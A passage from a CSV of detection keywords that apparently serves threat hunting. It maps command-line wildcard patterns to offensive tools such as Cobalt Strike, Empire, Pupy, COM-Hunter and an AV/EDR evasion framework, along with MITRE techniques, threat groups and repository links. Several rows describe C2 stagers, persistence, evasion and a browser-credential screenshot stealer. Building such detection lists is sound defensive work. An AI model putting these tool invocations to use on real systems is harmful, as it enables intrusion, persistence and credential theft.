APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types dll*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types ps1*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types py*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types svc.exe*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* --payload-types vbs*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. 
It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"* pcanywhere-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* pcworx-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -PE_Clone *","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" +"* -pe-exp-list *.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - 
T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"* -PEPath * -ExeArgs *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -PermanentWMI *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* Persist General *.dll*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"* Persist Tasksch *.dll*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"* Persist TreatAs *.dll*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking 
persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" +"* persist_hkcu_run*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"* Persistence.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"* -PersistenceScriptName *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -PersistentScriptFilePath *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* PEzor.sh *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"* -pfx *.pfx -dc-ip *","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","0","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"* pgsql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -pi \\\\\\\\.\\\\pipe\\\\*","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10",,"N/A",,, +"* Pictures\Screenshots\loot.zip*","offensive_tool_keyword","Harvester_OF_SORROW","The payload opens firefox about:logins and tabs and arrows its way through options. It then takes a screen shot with the first set of log in credentials made visible. 
Finally it sends the screenshot to an email of your choosing.","T1056.001 - T1113 - T1512 - T1566.001 - T1059.006","TA0004 - TA0009 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/blob/master/payloads/library/credentials/Harvester_OF_SORROW/payload.txt","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"* --pinject *","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"* -PipeName * -ServiceName * -Command whoami*","offensive_tool_keyword","Invoke-SMBRemoting","Interactive Shell and Command Execution over Named-Pipes (SMB)","T1059 - T1021.002 - T1572","TA0002 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Invoke-SMBRemoting","1","0","N/A","9","1","22","4","2023-10-02T10:21:34Z","2023-09-06T16:00:47Z" +"* pipename_stager *","offensive_tool_keyword","cobaltstrike","Malleable C2 is a domain specific language to redefine indicators in Beacon's communication. This repository is a collection of Malleable C2 profiles that you may use. 
These profiles work with Cobalt Strike 3.x","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/Malleable-C2-Profiles","1","0","N/A","10","10","1362","429","2021-05-18T14:45:39Z","2014-07-14T15:02:42Z" +"* -pipename_stager *","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","0","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"* pjl-info-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/nccgroup/nmap-nse-vulnerability-scripts","1","0","N/A","N/A","7","620","64","2022-03-04T09:08:55Z","2021-05-18T15:20:30Z" +"* pjl-ready-message.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --plugin KeeFarceRebornPlugin.dll*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* polenum.py*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - 